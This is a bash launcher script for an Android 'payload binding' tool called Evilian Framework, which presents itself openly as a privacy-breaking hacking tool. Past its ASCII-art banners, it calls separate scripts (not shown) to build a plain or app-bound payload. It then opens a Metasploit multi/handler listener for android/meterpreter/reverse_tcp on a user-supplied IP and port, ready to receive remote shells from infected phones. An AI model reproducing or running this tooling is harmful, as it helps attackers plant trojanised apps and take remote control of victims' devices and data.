#!/bin/bash
green='\033[0;32m'
yellow='\033[0;33m'
red='\033[0;31m'

clear

echo -e $green " ░██╗░░░░░░░██╗███████╗██╗░░░░░░█████╗░░█████╗░███╗░░░███╗███████╗  ██╗░░██╗░█████╗░░█████╗░██╗░░██╗███████╗██████╗░░░░ "
echo -e $green " ░██║░░██╗░░██║██╔════╝██║░░░░░██╔══██╗██╔══██╗████╗░████║██╔════╝  ██║░░██║██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗░░░ "
echo -e $green " ░╚██╗████╗██╔╝█████╗░░██║░░░░░██║░░╚═╝██║░░██║██╔████╔██║█████╗░░  ███████║███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝░░░  "
echo -e $green " ░░████╔═████║░██╔══╝░░██║░░░░░██║░░██╗██║░░██║██║╚██╔╝██║██╔══╝░░  ██╔══██║██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗░░░  "
echo -e $green " ░░╚██╔╝░╚██╔╝░███████╗███████╗╚█████╔╝╚█████╔╝██║░╚═╝░██║███████╗  ██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║██╗  "
echo -e $green " ░░░╚═╝░░░╚═╝░░╚══════╝╚══════╝░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝  "
echo -e $green "               .           .           "          
echo -e $green "               M.          .M          "     
echo -e $green "                MMMMMMMMMMM.           "     
echo -e $green "             .MMM\MMMMMMM/MMM.         "     
echo -e $green "            .MMM.7MMMMMMM.7MMM.        "     
echo -e $green "           .MMMMMMMMMMMMMMMMMMM        "     
echo -e $green "           MMMMMMM.......MMMMMMM       "     
echo -e $green "           MMMMMMMMMMMMMMMMMMMMM       "     
echo -e $green "      MMMM MMMMMMMMMMMMMMMMMMMMM MMMM  "   
echo -e $green "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $green "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $green "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "     
echo -e $green "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $green "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " 
echo -e $green "           MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $green "           MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $green "               MMMMM   MMMMM           "   
echo -e $green "               MMMMM   MMMMM           "   
echo -e $green "               MMMMM   MMMMM           "     
echo -e $green "███████╗██╗░░░██╗██╗██╗░░░░░██╗░█████╗░███╗░░██╗"
echo -e $green "██╔════╝██║░░░██║██║██║░░░░░██║██╔══██╗████╗░██║"
echo -e $green "█████╗░░╚██╗░██╔╝██║██║░░░░░██║███████║██╔██╗██║"
echo -e $green "██╔══╝░░░╚████╔╝░██║██║░░░░░██║██╔══██║██║╚████║"
echo -e $green "███████╗░░╚██╔╝░░██║███████╗██║██║░░██║██║░╚███║"
echo -e $green "╚══════╝░░░╚═╝░░░╚═╝╚══════╝╚═╝╚═╝░░╚═╝╚═╝░░╚══╝"
echo -e $green "x________________________________________________x"
echo -e $green "x    Evilian Framework v1.0 By EXPLOITERARMY     x"
echo -e $green "x         DEVELOPER - RISHAV VERMA               x"
echo -e $green "x    BREAK THE PRIVACY , BUT DON't BE SATAN      x"
echo -e $green "x────────────────────────────────────────────────x"

sleep 4

clear

echo -e $green "BEFORE RUN THIS TOOL MAKESURE YOU HAVE INSTALL THIS TOOLS:"
echo -e $green "--> zipalign       - (sudo apt install zipalign)"
echo -e $green "--> apksigner      - (sudo apt install apksigner)"
echo -e $green"--> openjdk-11-jdk - (sudo apt install openjdk-11-jdk)"
xterm -e apt install apksigner
xterm -e apt install zipalign
xterm -e apt install openjdk-8-jdk
sleep 5

clear

echo -e $red "               .           .           "          
echo -e $red "               M.          .M          "     
echo -e $red "                MMMMMMMMMMM.           "     
echo -e $red "             .MMM\MMMMMMM/MMM.         "     
echo -e $red "            .MMM.7MMMMMMM.7MMM.        "     
echo -e $red "           .MMMMMMMMMMMMMMMMMMM        "     
echo -e $red "           MMMMMMM.......MMMMMMM       "     
echo -e $red "           MMMMMMMMMMMMMMMMMMMMM       "     
echo -e $red "      MMMM MMMMMMMMMMMMMMMMMMMMM MMMM  "   
echo -e $red "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $red "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $red "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "     
echo -e $red "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $red "     dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " 
echo -e $red "           MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $red "           MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $red "               MMMMM   MMMMM           "   
echo -e $red "               MMMMM   MMMMM           "   
echo -e $red "               MMMMM   MMMMM           "     
echo -e $red "███████╗██╗░░░██╗██╗██╗░░░░░██╗░█████╗░███╗░░██╗"
echo -e $red "██╔════╝██║░░░██║██║██║░░░░░██║██╔══██╗████╗░██║"
echo -e $red "█████╗░░╚██╗░██╔╝██║██║░░░░░██║███████║██╔██╗██║"
echo -e $red "██╔══╝░░░╚████╔╝░██║██║░░░░░██║██╔══██║██║╚████║"
echo -e $red "███████╗░░╚██╔╝░░██║███████╗██║██║░░██║██║░╚███║"
echo -e $red "╚══════╝░░░╚═╝░░░╚═╝╚══════╝╚═╝╚═╝░░╚═╝╚═╝░░╚══╝"

echo -e $green "x________________________________________________x"
echo -e $green "x    Evilian Framework v1.0 By EXPLOITERARMY     x"
echo -e $green "x         DEVELOPER - RISHAV VERMA               x"
echo -e $green "x    BREAK THE PRIVACY , BUT DON't BE SATAN      x"
echo -e $green "x────────────────────────────────────────────────x"
echo
echo -e $yellow "--->Simple & Advanced PAYLOAD Binding TOOL"
echo -e $green
echo "1 SIMPLE PAYLOAD"
echo "2 BINDING METHOD"
echo -n "WHAT YOU WANT TO CHOOSE: "
read CHOOSE
echo
        if [ "$CHOOSE" = "1" ];
        then
                         echo "wait we are loading"
                         sleep 2
                         echo
                         bash si.sh
echo -e $green
echo -n "DO YOU WANT MAKE LISTENER press 1, for exit CTRL+C: "
read press
echo "WAIT WE ARE WORKING FOR YOUR LISTENER"
sleep 1
echo -e $yellow
echo -n "ENTER LISTENER IP: "
read IP
echo -n "ENTER LISTENER PORT"
read PORT
xterm -T LISTENER -e "konsole -e msfconsole -x 'use multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST $IP; set LPORT $PORT'"
echo -e $green
echo "GOOD BYE"

        elif [ "$CHOOSE" = "2" ];
        then
                         echo "wait we are loading"
                         sleep 2
                         bash bin.sh
echo -e $green
echo -n "DO YOU WANT MAKE LISTENER press 1, for exit CTRL+C: "
read press
echo "WAIT WE ARE WORKING FOR YOUR LISTENER"
sleep 1
echo -e $yellow
echo -n "ENTER LISTENER IP: "
read IP
echo -n "ENTER LISTENER PORT: "
read PORT
xterm -T LISTENER -e "konsole -e msfconsole -x 'use multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST $IP; set LPORT $PORT'"
echo -e $green
echo "GOOD BYE" 

fi